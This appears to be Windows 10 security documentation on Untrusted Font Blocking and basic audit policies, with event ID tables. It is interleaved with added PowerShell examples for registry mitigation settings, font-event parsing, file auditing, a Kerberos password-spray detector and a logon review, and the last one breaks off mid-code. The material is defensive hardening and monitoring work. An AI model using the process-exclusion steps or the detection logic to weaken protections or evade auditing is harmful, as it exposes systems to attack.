folder. For more information, see Introduction to Printer Graphics DLLs.
Using first or third-party apps that use memory-based fonts.
Using Internet Explorer to look at websites that use embedded fonts. In this situation, the feature blocks the
embedded font, causing the website to use a default font. However, not all fonts have all of the characters, so
the website might render differently.
Using desktop Office to look at documents with embedded fonts. In this situation, content shows up using a
default font picked by Office.

Turn on and use the Blocking Untrusted Fonts feature


Use Group Policy or the registry to turn this feature on, off, or to use audit mode.
To turn on and use the Blocking Untrusted Fonts feature through Group Policy
1. Open the Group Policy editor (gpedit.msc) and go to
Computer Configuration\Administrative Templates\System\Mitigation Options\Untrusted Font Blocking .
2. Click Enabled to turn the feature on, and then click one of the following Mitigation Options:
Block untrusted fonts and log events. Turns the feature on, blocking untrusted fonts and logging
installation attempts to the event log.
Do not block untrusted fonts. Turns the feature on, but doesn't block untrusted fonts nor does it
log installation attempts to the event log.
Log events without blocking untrusted fonts. Turns the feature on, logging installation attempts
to the event log, but not blocking untrusted fonts.
3. Click OK.
To turn on and use the Blocking Untrusted Fonts feature through the registry
To turn this feature on, off, or to use audit mode:
1. Open the registry editor (regedit.exe) and go to
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Kernel\ .
2. If the MitigationOptions key isn't there, right-click and add a new QWORD (64-bit) Value, renaming it to
MitigationOptions.
3. Right click on the MitigationOptions key, and then click Modify.
The Edit QWORD (64-bit) Value box opens.
4. Make sure the Base option is Hexadecimal, and then update the Value data, making sure you keep your
existing value, like in the important note below:
To turn this feature on. Type 1000000000000.
To turn this feature off. Type 2000000000000.
To audit with this feature. Type 3000000000000.

IMPORTANT
Your existing MitigationOptions values should be saved during your update. For example, if the current
value is 1000, your updated value should be 1000000001000.

5. Restart your computer.
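The registry procedure above in PowerShell, as an added example that is not part of the original document; it isolates the hexadecimal digit that holds the font-blocking mode (bit 48, so 1000000000000 is 1 shifted left by 48) and rewrites only that digit, which is exactly the "keep your existing value" behaviour the IMPORTANT note asks for.

```powershell
# Added example (not from the original): switch Untrusted Font Blocking on, off or to Audit by
# editing only the font-blocking digit of MitigationOptions, which is what the IMPORTANT note
# above asks for: 1000 becomes 1000000001000, not 1000000000000. The mode digit sits at
# bit 48 (0x1000000000000 = 1 shl 48). Run elevated; the change takes effect after a restart.
$KernelKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Kernel'
$FontShift = 48
$FontMask  = [int64]0xF -shl $FontShift          # the one hex digit that holds the mode
$FontMode  = @{ On = 1; Off = 2; Audit = 3 }     # values from the procedure above

function Get-MitigationOptions {
    # Current QWORD as [int64]; 0 when the value does not exist yet.
    $item = Get-ItemProperty -Path $KernelKey -Name MitigationOptions -ErrorAction SilentlyContinue
    if ($null -eq $item) { return [int64]0 }
    return [int64]$item.MitigationOptions
}

function Get-UntrustedFontBlockingMode {
    $digit = ((Get-MitigationOptions) -band $FontMask) -shr $FontShift
    switch ($digit) { 1 { 'On' } 2 { 'Off' } 3 { 'Audit' } default { 'Not configured' } }
}

function Set-UntrustedFontBlockingMode {
    param([Parameter(Mandatory)][ValidateSet('On', 'Off', 'Audit')][string]$Mode)
    $current = Get-MitigationOptions
    # Clear the font digit, keep every other bit, then OR in the requested mode.
    $new = ($current -band (-bnot $FontMask)) -bor ([int64]$FontMode[$Mode] -shl $FontShift)
    if ($null -eq (Get-ItemProperty -Path $KernelKey -Name MitigationOptions -ErrorAction SilentlyContinue)) {
        New-ItemProperty -Path $KernelKey -Name MitigationOptions -PropertyType QWord -Value $new | Out-Null
    } else {
        Set-ItemProperty -Path $KernelKey -Name MitigationOptions -Type QWord -Value $new
    }
    'MitigationOptions {0:X} -> {1:X} ({2})' -f $current, $new, $Mode
}

# Start in Audit mode, as the topic recommends, then read the mode back.
Set-UntrustedFontBlockingMode -Mode Audit
Get-UntrustedFontBlockingMode
```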

View the event log


After you turn this feature on, or start using Audit mode, you can look at your event logs for details.
To look at your event log
1. Open the event viewer (eventvwr.exe) and go to Application and Service
Logs/Microsoft/Windows/Win32k/Operational.
2. Scroll down to EventID: 260 and review the relevant events.
Event Example 1 - MS Word
WINWORD.EXE attempted loading a font that is restricted by font-loading policy.
FontType: Memory
FontPath:
Blocked: true

NOTE
Because the FontType is Memory, there’s no associated FontPath.

Event Example 2 - Winlogon


Winlogon.exe attempted loading a font that is restricted by font-loading policy.
FontType: File
FontPath: \??\C:\PROGRAM FILES (X86)\COMMON FILES\MICROSOFT SHARED\EQUATION\MTEXTRA.TTF
Blocked: true

NOTE
Because the FontType is File, there’s also an associated FontPath.

Event Example 3 - Internet Explorer running in Audit mode


Iexplore.exe attempted loading a font that is restricted by font-loading policy.
FontType: Memory
FontPath:
Blocked: false

NOTE
In Audit mode, the problem is recorded, but the font isn’t blocked.

Fix apps having problems because of blocked fonts


Your company may still need apps that are having problems because of blocked fonts, so we suggest that you first
run this feature in Audit mode to determine which fonts are causing the problems.
After you figure out the problematic fonts, you can try to fix your apps in 2 ways: by directly installing the fonts into
the %windir%/Fonts directory or by excluding the underlying processes and letting the fonts load. As the default
solution, we highly recommend that you install the problematic font. Installing fonts is safer than excluding apps
because excluded apps can load any font, trusted or untrusted.
To fix your apps by installing the problematic fonts (recommended)
On each computer with the app installed, right-click on the font name and click Install.
The font should automatically install into your %windir%/Fonts directory. If it doesn’t, you’ll need to
manually copy the font files into the Fonts directory and run the installation from there.
To fix your apps by excluding processes
1. On each computer with the app installed, open regedit.exe and go to
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<process_image_name> .

For example, if you want to exclude Microsoft Word processes, you’d use
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Winword.exe .
2. Add any additional processes that need to be excluded here, and then turn the Blocking untrusted fonts
feature on, using the steps in the Turn on and use the Blocking Untrusted Fonts feature section of this topic.
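Triage for the two sections above (View the event log, Fix apps), as an added PowerShell example that is not part of the original document: it reads event 260 from Win32k/Operational, parses the message layout shown in the three event examples (an assumption; other layouts are not handled) and groups the results by process and font, which is the input you need to choose per font between installing it and excluding the process; the sample messages are constructed from those examples.

```powershell
# Added example (not from the original): summarise Untrusted Font Blocking events (ID 260 in
# Microsoft-Windows-Win32k/Operational) after an Audit-mode run, to see which processes load
# which untrusted fonts before deciding per font: install it into %windir%\Fonts (recommended)
# or exclude the process. Parsing assumes the message layout shown in the three examples above.
$FontLog = 'Microsoft-Windows-Win32k/Operational'

function ConvertFrom-FontBlockMessage {
    param([Parameter(Mandatory)][string]$Message)
    # Layout:  <image> attempted loading a font that is restricted by font-loading policy.
    #          FontType: Memory|File / FontPath: <path or empty> / Blocked: true|false
    $pattern = '^(?<Process>\S+) attempted loading a font.*?FontType:\s*(?<Type>\w+)\s*' +
               'FontPath:[ \t]*(?<Path>[^\r\n]*)\s*Blocked:\s*(?<Blocked>true|false)'
    $m = [regex]::Match($Message, $pattern, 'Singleline,IgnoreCase')
    if (-not $m.Success) { return $null }
    $path = $m.Groups['Path'].Value.Trim()
    # A memory font has no FontPath, so there is no file to install; exclusion is the only fix.
    if (-not $path) { $path = '(memory font: nothing to install)' }
    [pscustomobject]@{
        Process  = $m.Groups['Process'].Value
        FontType = $m.Groups['Type'].Value
        FontPath = $path
        Blocked  = [bool]::Parse($m.Groups['Blocked'].Value)
    }
}

function Get-UntrustedFontReport {
    param([int]$MaxEvents = 2000)
    $events = Get-WinEvent -FilterHashtable @{ LogName = $FontLog; Id = 260 } `
                           -MaxEvents $MaxEvents -ErrorAction SilentlyContinue
    $rows = foreach ($e in $events) {
        $r = ConvertFrom-FontBlockMessage -Message $e.Message
        if ($r) { $r | Add-Member -NotePropertyName Time -NotePropertyValue $e.TimeCreated -PassThru }
    }
    # One row per process/font pair: how often it happened and whether it was blocked or only audited.
    $rows | Group-Object Process, FontType, FontPath | ForEach-Object {
        [pscustomobject]@{
            Process  = $_.Group[0].Process
            FontType = $_.Group[0].FontType
            FontPath = $_.Group[0].FontPath
            Hits     = $_.Count
            Blocked  = @($_.Group | Where-Object Blocked).Count -gt 0
            LastSeen = ($_.Group | Sort-Object Time -Descending | Select-Object -First 1).Time
        }
    } | Sort-Object Hits -Descending
}

# Constructed sample messages in the layout of the three examples, so the parser can be
# checked without touching a live log.
$SampleMessages = @(
    "WINWORD.EXE attempted loading a font that is restricted by font-loading policy.`r`nFontType: Memory`r`nFontPath:`r`nBlocked: true",
    "Winlogon.exe attempted loading a font that is restricted by font-loading policy.`r`nFontType: File`r`nFontPath: \??\C:\PROGRAM FILES (X86)\COMMON FILES\MICROSOFT SHARED\EQUATION\MTEXTRA.TTF`r`nBlocked: true",
    "Iexplore.exe attempted loading a font that is restricted by font-loading policy.`r`nFontType: Memory`r`nFontPath:`r`nBlocked: false"
)
$SampleMessages | ForEach-Object { ConvertFrom-FontBlockMessage -Message $_ } | Format-Table -AutoSize

# Live report from the local Win32k/Operational log.
Get-UntrustedFontReport | Format-Table -AutoSize
```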

Related content
Dropping the “Untrusted Font Blocking” setting
Security auditing
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Topics in this section are for IT professionals and describe the security auditing features in Windows and how your organization can benefit from using these technologies to enhance the security and manageability of your network.

Security auditing is one of the most powerful tools that you can use to maintain the integrity of your system. As
part of your overall security strategy, you should determine the level of auditing that is appropriate for your
environment. Auditing should identify attacks (successful or not) that pose a threat to your network, and attacks
against resources that you have determined to be valuable in your risk assessment.

In this section
Topic | Description
Basic security audit policies | Before you implement auditing, you must decide on an auditing policy. A basic audit policy specifies categories of security-related events that you want to audit. When this version of Windows is first installed, all auditing categories are disabled. By enabling various auditing event categories, you can implement an auditing policy that suits the security needs of your organization.
Advanced security audit policies | Advanced security audit policy settings are found in Security Settings\Advanced Audit Policy Configuration\System Audit Policies and appear to overlap with basic security audit policies, but they are recorded and applied differently.
Basic security audit policies
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Before you implement auditing, you must decide on an auditing policy. A basic audit policy specifies categories of
security-related events that you want to audit. When this version of Windows is first installed, all auditing
categories are disabled. By enabling various auditing event categories, you can implement an auditing policy that
suits the security needs of your organization.
The event categories that you can choose to audit are:
Audit account logon events
Audit account management
Audit directory service access
Audit logon events
Audit object access
Audit policy change
Audit privilege use
Audit process tracking
Audit system events
If you choose to audit access to objects as part of your audit policy, you must enable either the audit directory
service access category (for auditing objects on a domain controller), or the audit object access category (for
auditing objects on a member server or workstation). Once you have enabled the object access category, you can
specify the types of access you want to audit for each group or user.

In this section
Topic | Description
Create a basic audit policy for an event category | By defining auditing settings for specific event categories, you can create an auditing policy that suits the security needs of your organization. On devices that are joined to a domain, auditing settings for the event categories are undefined by default. On domain controllers, auditing is turned on by default.
Apply a basic audit policy on a file or folder | You can apply audit policies to individual files and folders on your computer by setting the permission type to record successful access attempts or failed access attempts in the security log.
View the security event log | The security log records each event as defined by the audit policies you set on each object.
Basic security audit policy settings | Basic security audit policy settings are found under Computer Configuration\Windows Settings\Security Settings\Local Policies\Audit Policy.
Create a basic audit policy for an event category
4/5/2019 • 2 minutes to read

Applies to
Windows 10
By defining auditing settings for specific event categories, you can create an auditing policy that suits the security
needs of your organization. On devices that are joined to a domain, auditing settings for the event categories are
undefined by default. On domain controllers, auditing is turned on by default.
To complete this procedure, you must be logged on as a member of the built-in Administrators group.
To define or modify auditing policy settings for an event category for your local computer
1. Open the Local Security Policy snap-in (secpol.msc), and then click Local Policies.
2. Click Audit Policy.
3. In the results pane, double-click an event category that you want to change the auditing policy settings for.
4. Do one or both of the following, and then click OK.
To audit successful attempts, select the Success check box.
To audit unsuccessful attempts, select the Failure check box.
To complete this procedure, you must be logged on as a member of the Domain Admins group.
To define or modify auditing policy settings for an event category for a domain or organizational unit,
when you are on a member server or on a workstation that is joined to a domain
1. Open the Group Policy Management Console (GPMC).
2. In the console tree, double-click Group Policy objects in the forest and domain containing the Default
Domain Policy Group Policy object (GPO) that you want to edit.
3. Right-click the Default Domain Policy GPO, and then click Edit.
4. In the GPMC, go to Computer Configuration, Windows Settings, Security Settings, and then click Audit
Policy.
5. In the results pane, double-click an event category that you want to change the auditing policy settings for.
6. If you are defining auditing policy settings for this event category for the first time, select the Define these
policy settings check box.
7. Do one or both of the following, and then click OK.
To audit successful attempts, select the Success check box.
To audit unsuccessful attempts, select the Failure check box.

Additional considerations
To audit object access, enable auditing of the object access event category by following the steps above. Then,
enable auditing on the specific object.
After your audit policy is configured, events will be recorded in the Security log. Open the Security log to view
these events.
The default auditing policy setting for domain controllers is No Auditing. This means that even if auditing is
enabled in the domain, the domain controllers do not inherit auditing policy locally. If you want domain auditing
policy to apply to domain controllers, you must modify this policy setting.
Apply a basic audit policy on a file or folder
4/5/2019 • 2 minutes to read

Applies to
Windows 10
You can apply audit policies to individual files and folders on your computer by setting the permission type to
record successful access attempts or failed access attempts in the security log. To complete this procedure, you
must be logged on as a member of the built-in Administrators group or you must have been granted the Manage
auditing and security log right.
To apply or modify auditing policy settings for a local file or folder
1. Right-click the file or folder that you want to audit, click Properties, and then click the Security tab.
2. Click Advanced.
3. In the Advanced Security Settings dialog box, click the Auditing tab, and then click Continue.
4. Do one of the following:
To set up auditing for a new user or group, click Add. Click Select a principal, type the name of the user
or group that you want, and then click OK.
To remove auditing for an existing group or user, click the group or user name, click Remove, click OK,
and then skip the rest of this procedure.
To view or change auditing for an existing group or user, click its name, and then click Edit.
5. In the Type box, indicate what actions you want to audit by selecting the appropriate check boxes:
To audit successful events, click Success.
To audit failure events, click Fail.
To audit all events, click All.

Important: Before setting up auditing for files and folders, you must enable object access auditing by defining
auditing policy settings for the object access event category. If you do not enable object access auditing, you
will receive an error message when you set up auditing for files and folders, and no files or folders will be
audited.

Additional considerations
After object access auditing is enabled, view the security log in Event Viewer to review the results of your
changes.
You can set up file and folder auditing only on NTFS drives.
Because the security log is limited in size, select the files and folders to be audited carefully. Also, consider the
amount of disk space that you want to devote to the security log. The maximum size for the security log is
defined in Event Viewer.
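The two procedures above (turn on the Object Access category, then put a SACL on a folder) as one script. This is an added example, not part of the original page: C:\Finance is a hypothetical folder and the rights audited are illustrative. Run it from an elevated prompt, because writing a SACL requires the Manage auditing and security log right.

```powershell
# Added example (not from the original page): scripted equivalent of the GUI
# steps above. $Path is a hypothetical folder.
$Path = 'C:\Finance'

# 1. The Object Access category must be on, otherwise the SACL is stored but
#    never produces events. auditpol edits the effective policy directly;
#    a domain GPO can overwrite it at the next refresh.
auditpol /set /category:"Object Access" /success:enable /failure:enable | Out-Null

# 2. File and folder auditing is only available on NTFS volumes.
$root = [System.IO.Path]::GetPathRoot((Resolve-Path $Path).Path)
$fmt  = [System.IO.DriveInfo]::new($root).DriveFormat
if ($fmt -ne 'NTFS') { throw "Auditing needs NTFS, but $root is $fmt" }

# 3. Audit rules: failed reads by anyone, and every successful or failed
#    write/delete, inherited by subfolders and files.
$who     = [System.Security.Principal.NTAccount]'Everyone'
$inherit = [System.Security.AccessControl.InheritanceFlags]'ContainerInherit, ObjectInherit'
$prop    = [System.Security.AccessControl.PropagationFlags]::None
$rules = @(
    [System.Security.AccessControl.FileSystemAuditRule]::new(
        $who, 'ReadData', $inherit, $prop, 'Failure'),
    [System.Security.AccessControl.FileSystemAuditRule]::new(
        $who, 'WriteData, Delete, DeleteSubdirectoriesAndFiles', $inherit, $prop, 'Success, Failure')
)

# Get-Acl returns the SACL only when asked for it with -Audit.
$acl = Get-Acl -Path $Path -Audit
foreach ($r in $rules) { $acl.AddAuditRule($r) }
Set-Acl -Path $Path -AclObject $acl

# 4. Verify: read the SACL back and show the category that makes it fire.
(Get-Acl -Path $Path -Audit).Audit |
    Select-Object IdentityReference, FileSystemRights, AuditFlags, IsInherited |
    Format-Table -AutoSize
auditpol /get /category:"Object Access"
```

Auditing ReadData on a busy share produces an event per handle, so scope the rule to the folders that matter and size the Security log (step 4 of the next topic) before turning it on.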
View the security event log
4/5/2019 • 2 minutes to read

Applies to
Windows 10
The security log records each event as defined by the audit policies you set on each object.
To view the security log
1. Open Event Viewer.
2. In the console tree, expand Windows Logs, and then click Security. The results pane lists individual security
events.
3. If you want to see more details about a specific event, in the results pane, click the event.
Basic security audit policy settings
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Basic security audit policy settings are found under Computer Configuration\Windows Settings\Security Settings\Local Policies\Audit Policy.
The event IDs listed in the topics below are the legacy identifiers used by Windows XP and Windows Server 2003. On Windows 10 the same events are written by the Microsoft-Windows-Security-Auditing provider and in most cases carry the legacy ID plus 4096 (528 became 4624, 529 became 4625, 592 became 4688, 672 became 4768); a few differ, for example 517 (audit log cleared) became 1102 and 540 (network logon) was folded into 4624. Filter on the current IDs when you query a Windows 10 Security log.

In this section
TOPIC                           DESCRIPTION
Audit account logon events      Determines whether to audit each instance of a user logging on to or logging off from another device in which this device is used to validate the account.
Audit account management        Determines whether to audit each event of account management on a device.
Audit directory service access  Determines whether to audit the event of a user accessing an Active Directory object that has its own system access control list (SACL) specified.
Audit logon events              Determines whether to audit each instance of a user logging on to or logging off from a device.
Audit object access             Determines whether to audit the event of a user accessing an object (for example, a file, folder, registry key, or printer) that has its own system access control list (SACL) specified.
Audit policy change             Determines whether to audit every incident of a change to user rights assignment policies, audit policies, or trust policies.
Audit privilege use             Determines whether to audit each instance of a user exercising a user right.
Audit process tracking          Determines whether to audit detailed tracking information for events such as program activation, process exit, handle duplication, and indirect object access.
Audit system events             Determines whether to audit when a user restarts or shuts down the computer or when an event occurs that affects either the system security or the security log.

Related topics
Basic security audit policy settings
Audit account logon events
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Determines whether to audit each instance of a user logging on to or logging off from another device in which this
device is used to validate the account.
This security setting determines whether to audit each instance of a user logging on to or logging off from another
computer in which this computer is used to validate the account. Account logon events are generated when a
domain user account is authenticated on a domain controller. The event is logged in the domain controller's
security log. Logon events are generated when a local user is authenticated on a local computer. The event is
logged in the local security log. Account logoff events are not generated.
If you define this policy setting, you can specify whether to audit successes, audit failures, or not audit the event
type at all. Success audits generate an audit entry when an account logon attempt succeeds. Failure audits
generate an audit entry when an account logon attempt fails. To set this value to No auditing, in the Properties
dialog box for this policy setting, select the Define these policy settings check box and clear the Success and
Failure check boxes.
Default: Success

Configure this audit setting


You can configure this security setting by opening the appropriate policy under Computer Configuration\Windows
Settings\Security Settings\Local Policies\Audit Policy.

LOGON EVENTS  DESCRIPTION
672   An authentication service (AS) ticket was successfully issued and validated.
673   A ticket granting service (TGS) ticket was granted.
674   A security principal renewed an AS ticket or TGS ticket.
675   Preauthentication failed. This event is generated on a Key Distribution Center (KDC) when a user types in an incorrect password.
676   Authentication ticket request failed. This event is not generated in Windows XP or in the Windows Server 2003 family.
677   A TGS ticket was not granted. This event is not generated in Windows XP or in the Windows Server 2003 family.
678   An account was successfully mapped to a domain account.
681   Logon failure. A domain account logon was attempted. This event is not generated in Windows XP or in the Windows Server 2003 family.
682   A user has reconnected to a disconnected terminal server session.
683   A user disconnected a terminal server session without logging off.
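An added example (not from the original page) that serves both the View the security event log topic above and this one: it reads events from the Security log by field name rather than by position, and uses the result to flag a password spray against the KDC. Preauthentication failure is legacy event 675; on Windows 10 and Windows Server 2008 or later it is event 4771, which is what the code filters on. The events at the bottom are constructed and trimmed to the fields used, so the example runs without a domain controller; the last two lines show the live query.

```powershell
# Added example (not from the original page). Parse Security events by field
# name and flag one source address failing Kerberos pre-authentication
# against many different accounts (a password spray).
function ConvertFrom-SecurityEventXml {
    # One object per event: Id, Time, plus every EventData field keyed by its
    # Name attribute, so nothing here depends on the order of the fields.
    param([Parameter(ValueFromPipeline)][string]$Xml)
    process {
        $x = [xml]$Xml
        $eid = $x.Event.System.EventID
        if ($eid -is [System.Xml.XmlElement]) { $eid = $eid.'#text' }   # legacy events carry a Qualifiers attribute
        $o = [ordered]@{ Id = [int]$eid; Time = [datetime]$x.Event.System.TimeCreated.SystemTime }
        foreach ($d in $x.Event.EventData.Data) { $o[$d.GetAttribute('Name')] = $d.'#text' }
        [pscustomobject]$o
    }
}

function Find-KerberosSpray {
    # Group 4771 failures by client address and report an address that hits
    # $MinAccounts or more distinct accounts inside $Window.
    param($Events, [int]$MinAccounts = 5, [timespan]$Window = [timespan]::FromMinutes(10))
    $Events | Where-Object Id -eq 4771 | Group-Object IpAddress | ForEach-Object {
        $hits     = @($_.Group | Sort-Object Time)
        $span     = $hits[-1].Time - $hits[0].Time
        $accounts = @($hits.TargetUserName | Sort-Object -Unique)
        if ($accounts.Count -ge $MinAccounts -and $span -le $Window) {
            [pscustomobject]@{ IpAddress = $_.Name; Accounts = $accounts.Count; Failures = $hits.Count; Span = $span }
        }
    }
}

# Constructed sample (not real log data): six failures from one address
# against six accounts within two minutes, plus one typo from another
# address. Status 0x18 is KDC_ERR_PREAUTH_FAILED (wrong password).
$sample = 0..6 | ForEach-Object {
    $ip  = if ($_ -lt 6) { '::ffff:10.0.0.77' } else { '::ffff:10.0.0.5' }
    $who = if ($_ -lt 6) { "user$_" } else { 'alice' }
    $t   = '2019-04-05T08:0{0}:00.000Z' -f ($_ % 3)
@"
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4771</EventID><TimeCreated SystemTime="$t"/></System>
  <EventData>
    <Data Name="TargetUserName">$who</Data>
    <Data Name="IpAddress">$ip</Data>
    <Data Name="Status">0x18</Data>
  </EventData>
</Event>
"@
}

$parsed = $sample | ConvertFrom-SecurityEventXml
Find-KerberosSpray -Events $parsed | Format-Table -AutoSize
# One row is reported for ::ffff:10.0.0.77 (6 accounts, 6 failures); 10.0.0.5 is not flagged.

# Live equivalent on a domain controller (needs read access to the Security log):
#   Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4771; StartTime=(Get-Date).AddHours(-1)} |
#       ForEach-Object { $_.ToXml() } | ConvertFrom-SecurityEventXml | Find-KerberosSpray
```

The same address sending many failures against one account is a brute force rather than a spray; swap the grouping key to TargetUserName to catch that case, and remember that a spray against a lockout-protected domain deliberately stays under the lockout threshold per account, which is why the detector counts distinct accounts per source instead of failures per account.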

Related topics
Basic security audit policy settings
Audit account management
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Determines whether to audit each event of account management on a device.
Examples of account management events include:
A user account or group is created, changed, or deleted.
A user account is renamed, disabled, or enabled.
A password is set or changed.
If you define this policy setting, you can specify whether to audit successes, audit failures, or not audit the event
type at all. Success audits generate an audit entry when any account management event succeeds. Failure audits
generate an audit entry when any account management event fails. To set this value to No auditing, in the
Properties dialog box for this policy setting, select the Define these policy settings check box and clear the
Success and Failure check boxes.
Default:
Success on domain controllers.
No auditing on member servers.

Configure this audit setting


You can configure this security setting by opening the appropriate policy under Computer Configuration\Windows
Settings\Security Settings\Local Policies\Audit Policy.

ACCOUNT MANAGEMENT EVENTS  DESCRIPTION
624   A user account was created.
627   A user password was changed.
628   A user password was set.
630   A user account was deleted.
631   A global group was created.
632   A member was added to a global group.
633   A member was removed from a global group.
634   A global group was deleted.
635   A new local group was created.
636   A member was added to a local group.
637   A member was removed from a local group.
638   A local group was deleted.
639   A local group account was changed.
641   A global group account was changed.
642   A user account was changed.
643   A domain policy was modified.
644   A user account was auto locked.
645   A computer account was created.
646   A computer account was changed.
647   A computer account was deleted.
648   A local security group with security disabled was created. Note: SECURITY_DISABLED in the formal name means that this group cannot be used to grant permissions in access checks.
649   A local security group with security disabled was changed.
650   A member was added to a security-disabled local security group.
651   A member was removed from a security-disabled local security group.
652   A security-disabled local group was deleted.
653   A security-disabled global group was created.
654   A security-disabled global group was changed.
655   A member was added to a security-disabled global group.
656   A member was removed from a security-disabled global group.
657   A security-disabled global group was deleted.
658   A security-enabled universal group was created.
659   A security-enabled universal group was changed.
660   A member was added to a security-enabled universal group.
661   A member was removed from a security-enabled universal group.
662   A security-enabled universal group was deleted.
663   A security-disabled universal group was created.
664   A security-disabled universal group was changed.
665   A member was added to a security-disabled universal group.
666   A member was removed from a security-disabled universal group.
667   A security-disabled universal group was deleted.
668   A group type was changed.
684   The security descriptor of members of administrative groups was set. Note: Every 60 minutes on a domain controller a background thread (the AdminSDHolder propagation process, SDProp) searches all members of administrative groups (such as domain, enterprise, and schema administrators) and applies a fixed security descriptor on them. This event is logged each time, so it is routine noise on a domain controller; a change to the AdminSDHolder object itself, which alters what gets stamped, is the thing worth alerting on.
685   The name of an account was changed.

Related topics
Basic security audit policy settings
Audit directory service access
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Determines whether to audit the event of a user accessing an Active Directory object that has its own system access control list (SACL) specified.
By default, this value is set to no auditing in the Default Domain Controller Group Policy object (GPO), and it remains undefined for workstations and servers, where it has no meaning.
If you define this policy setting, you can specify whether to audit successes, audit failures, or not audit the event
type at all. Success audits generate an audit entry when a user successfully accesses an Active Directory object that
has a SACL specified. Failure audits generate an audit entry when a user unsuccessfully attempts to access an
Active Directory object that has a SACL specified. To set this value to No auditing, in the Properties dialog box
for this policy setting, select the Define these policy settings check box and clear the Success and Failure check
boxes.

Note: You can set a SACL on an Active Directory object by using the Security tab in that object's Properties
dialog box. This is the same as Audit object access, except that it applies only to Active Directory objects and
not to file system and registry objects.

Default:
Success on domain controllers.
Undefined for a member server.

Configure this audit setting


You can configure this security setting under Computer Configuration\Windows Settings\Security Settings\Local
Policies\Audit Policy.
There is only one directory service access event, which is identical to the Object Access security event message
566.

DIRECTORY SERVICE ACCESS EVENTS DESCRIPTION

566 A generic object operation took place.

Related topics
Basic security audit policy settings
Audit logon events
4/5/2019 • 4 minutes to read

Applies to
Windows 10
Determines whether to audit each instance of a user logging on to or logging off from a device.
Account logon events are generated on domain controllers for domain account activity and on local devices for
local account activity. If both account logon and logon audit policy categories are enabled, logons that use a
domain account generate a logon or logoff event on the workstation or server, and they generate an account logon
event on the domain controller. Additionally, interactive logons to a member server or workstation that use a
domain account generate a logon event on the domain controller as the logon scripts and policies are retrieved
when a user logs on. For more info about account logon events, see Audit account logon events.
If you define this policy setting, you can specify whether to audit successes, audit failures, or not audit the event
type at all. Success audits generate an audit entry when a logon attempt succeeds. Failure audits generate an audit
entry when a logon attempt fails.
To set this value to No auditing, in the Properties dialog box for this policy setting, select the Define these
policy settings check box and clear the Success and Failure check boxes.
For information about advanced security policy settings for logon events, see the Logon/logoff section in
Advanced security audit policy settings.

Configure this audit setting


You can configure this security setting by opening the appropriate policy under Computer Configuration\Windows
Settings\Security Settings\Local Policies\Audit Policy.

LOGON EVENTS  DESCRIPTION
528   A user successfully logged on to a computer. For information about the type of logon, see the Logon Types table below.
529   Logon failure. A logon attempt was made with an unknown user name or a known user name with a bad password.
530   Logon failure. A logon attempt was made by a user account outside of the allowed logon hours.
531   Logon failure. A logon attempt was made using a disabled account.
532   Logon failure. A logon attempt was made using an expired account.
533   Logon failure. A logon attempt was made by a user who is not allowed to log on at this computer.
534   Logon failure. The user attempted to log on with a type that is not allowed.
535   Logon failure. The password for the specified account has expired.
536   Logon failure. The Net Logon service is not active.
537   Logon failure. The logon attempt failed for other reasons.
538   The logoff process was completed for a user.
539   Logon failure. The account was locked out at the time the logon attempt was made.
540   A user successfully logged on to a network.
541   Main mode Internet Key Exchange (IKE) authentication was completed between the local computer and the listed peer identity (establishing a security association), or quick mode has established a data channel.
542   A data channel was terminated.
543   Main mode was terminated.
544   Main mode authentication failed because the peer did not provide a valid certificate or the signature was not validated.
545   Main mode authentication failed because of a Kerberos failure or a password that is not valid.
546   IKE security association establishment failed because the peer sent a proposal that is not valid. A packet was received that contained data that is not valid.
547   A failure occurred during an IKE handshake.
548   Logon failure. The security ID (SID) from a trusted domain does not match the account domain SID of the client.
549   Logon failure. All SIDs corresponding to untrusted namespaces were filtered out during an authentication across forests.
550   Notification message that could indicate a possible denial-of-service attack.
551   A user initiated the logoff process.
552   A user successfully logged on to a computer using explicit credentials while already logged on as a different user.
682   A user has reconnected to a disconnected terminal server session.
683   A user disconnected a terminal server session without logging off.

When event 528 is logged, a logon type is also listed in the event log. The following table describes each logon
type.

LOGON TYPE  LOGON TITLE        DESCRIPTION
2           Interactive        A user logged on to this computer.
3           Network            A user or computer logged on to this computer from the network.
4           Batch              Batch logon type is used by batch servers, where processes may be executing on behalf of a user without their direct intervention.
5           Service            A service was started by the Service Control Manager.
7           Unlock             This workstation was unlocked.
8           NetworkCleartext   A user logged on to this computer from the network. The user's password was passed to the authentication package in its unhashed form. The built-in authentication packages all hash credentials before sending them across the network. The credentials do not traverse the network in plaintext (also called cleartext).
9           NewCredentials     A caller cloned its current token and specified new credentials for outbound connections. The new logon session has the same local identity, but uses different credentials for other network connections.
10          RemoteInteractive  A user logged on to this computer remotely using Terminal Services or Remote Desktop.
11          CachedInteractive  A user logged on to this computer with network credentials that were stored locally on the computer. The domain controller was not contacted to verify the credentials.
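An added example (not from the original page) that turns the logon type table into a triage pass over successful logons. Legacy 528/540 are event 4624 on Windows 10, which is what the live query reads. The sample logons are constructed stand-ins for parsed events, the jump-host address 10.0.0.9 is hypothetical, and the live part assumes the documented 4624 field order (TargetUserName is the 6th EventData field, LogonType the 9th, WorkstationName the 12th, IpAddress the 19th, counted from 0 as 5, 8, 11 and 18), which is how the Properties array exposes them.

```powershell
# Added example (not from the original page): group successful logons by
# logon type and annotate the types the table above says deserve a look.
$LogonTitle = @{ 2='Interactive'; 3='Network'; 4='Batch'; 5='Service'; 7='Unlock';
                 8='NetworkCleartext'; 9='NewCredentials'; 10='RemoteInteractive'; 11='CachedInteractive' }

function Get-LogonReview {
    # $Logons: objects with LogonType, TargetUserName, IpAddress, WorkstationName.
    # Returns one row per (type, account, source) with a triage note.
    param([object[]]$Logons, [string[]]$JumpHosts = @())
    $Logons | Group-Object LogonType, TargetUserName, IpAddress | ForEach-Object {
        $first = $_.Group[0]
        $type  = [int]$first.LogonType
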